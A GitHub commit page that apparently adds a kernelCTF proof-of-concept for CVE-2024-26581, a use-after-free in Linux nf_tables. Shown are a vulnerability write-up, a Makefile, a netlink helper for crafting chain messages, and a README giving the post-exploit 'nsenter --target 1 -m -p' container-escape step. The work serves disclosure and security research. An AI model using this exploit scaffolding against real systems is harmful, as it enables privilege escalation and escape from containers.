Add kernelCTF CVE-2024-26581_lts_cos_mitigation (#109)

* Add CVE-2024-1085_lts * Change metadata.json * Change exploit.c * Change exploit.c * Change exploit.c * Change exploit.c * Fix bug * Fix bug * Add more details * Add CVE-2024-26581_lts_cos_mitigation * Fix metadata.json * Fix exploit * Fix exploit * Fix exploit * Add more details in exploit.md * Add more details in exploit.md * Add more details in exploit.md * Fix cos exploit.c * Fix cos exploit.c * Fix cos exploit.c * Delete pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/exploit * add more details in exploit.md * for stability test * for stability test * for stability test * for stability test * for stability test * for stability test * for stability test --------- Co-authored-by: lonial con <kongln9170@gmail.com>
google · Aug 29, 2024 · 7f0fd3f · 7f0fd3f
1 parent 699139f
commit 7f0fd3f
Show file tree

Hide file tree

Showing 30 changed files with 4,357 additions and 0 deletions.
diff --git a/pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/docs/exploit.md
diff --git a/pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/docs/vulnerability.md
@@ -0,0 +1,48 @@
+# Vulneribility
+In function `nft_rbtree_gc_elem`, it lacks a check similar to this [commit](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/net/netfilter/nft_set_rbtree.c?id=2ee52ae94baabf7ee09cf2a8d854b990dac5d0e4) for the setelement pointed to by `prev`. 
+This is the existing check for looking for prev:
+```c 
+    while (prev) {
+        rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
+        if (nft_rbtree_interval_end(rbe_prev) &&
+        nft_set_elem_active(&rbe_prev->ext, genmask))
+            break;
+        prev = rb_prev(prev);
+    }
+```
+and this is how it should be checked:
+```c
+    u8 cur_genmask = nft_genmask_cur(net);
+    while (prev) {
+        rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
+        if (nft_rbtree_interval_end(rbe_prev) &&
+        nft_set_elem_active( &rbe_prev->ext,  genmask) &&
+        nft_set_elem_active(&rbe_prev->ext, cur_genmask))
+            break;
+        prev = rb_prev(prev);
+    }
+```
+The lack of this check may result in use-after-free of the set element pointed to by prev.
+
+## Requirements to trigger the vulnerability
+ - Capabilities:  `CAP_NET_ADMIN` capability is required.
+ - Kernel configuration: `CONFIG_NETFILTER`, `CONFIG_NF_TABLES`
+ - Are user namespaces needed?: Yes
+
+## Commit which introduced the vulnerability
+ - [commit c9e6978e2725a7d4b6cd23b2facd3f11422c0643](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nft_set_rbtree.c?id=c9e6978e2725a7d4b6cd23b2facd3f11422c0643)
+
+## Commit which fixed the vulnerability
+- [commit 60c0c230c6f046da536d3df8b39a20b9a9fd6af0](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter?id=60c0c230c6f046da536d3df8b39a20b9a9fd6af0)
+
+## Affected kernel versions
+- 6.1.9 and later
+- 5.15.91 and later
+- 5.10.166 and later
+
+## Affected component, subsystem
+- net/netfilter (nf_tables)
+
+## Cause
+- UAF
+
diff --git a/pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/Makefile b/pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/Makefile
@@ -0,0 +1,9 @@
+exploit:
+	gcc -o exploit exploit.c -I/usr/include/libnl3 -lnl-nf-3 -lnl-route-3 -lnl-3 -static
+prerequisites:
+	sudo apt-get install libnl-nf-3-dev
+run:
+	./exploit
+
+clean:
+	rm exploit
diff --git a/pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/README b/pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/README
@@ -0,0 +1,2 @@
+Exploit for kctf cos-105-17412.226.68
+Run command "nsenter --target 1 -m -p" after run the poc.
diff --git a/pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/chain.h b/pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/chain.h
@@ -0,0 +1,24 @@
+extern int cur_handle;
+struct nlmsghdr * new_chain_msg(char *table_name, char *chain_name, int if_binding){
+    struct nl_msg * msg2 = nlmsg_alloc();
+    struct nlmsghdr *hdr2 = nlmsg_put(
+            msg2,
+            NL_AUTO_PORT, // auto assign current pid
+            NL_AUTO_SEQ, // begin wit seq number 0
+            (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWCHAIN),// TYPE
+            sizeof(struct nfgenmsg),
+            NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO
+    );
+    struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg));
+    h2->nfgen_family = 2;//NFPROTO_IPV4;
+    h2->version = 0;
+    h2->res_id = NFNL_SUBSYS_NFTABLES;
+    memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg));
+    nla_put_string(msg2, NFTA_CHAIN_TABLE, table_name);
+    nla_put_string(msg2, NFTA_CHAIN_NAME, chain_name);
+    if(if_binding>0){
+            nla_put_u32(msg2, NFTA_CHAIN_FLAGS, htonl(NFT_CHAIN_BINDING));
+    }
+    cur_handle++;
+    return hdr2;
+}
diff --git a/pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/exploit b/pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/exploit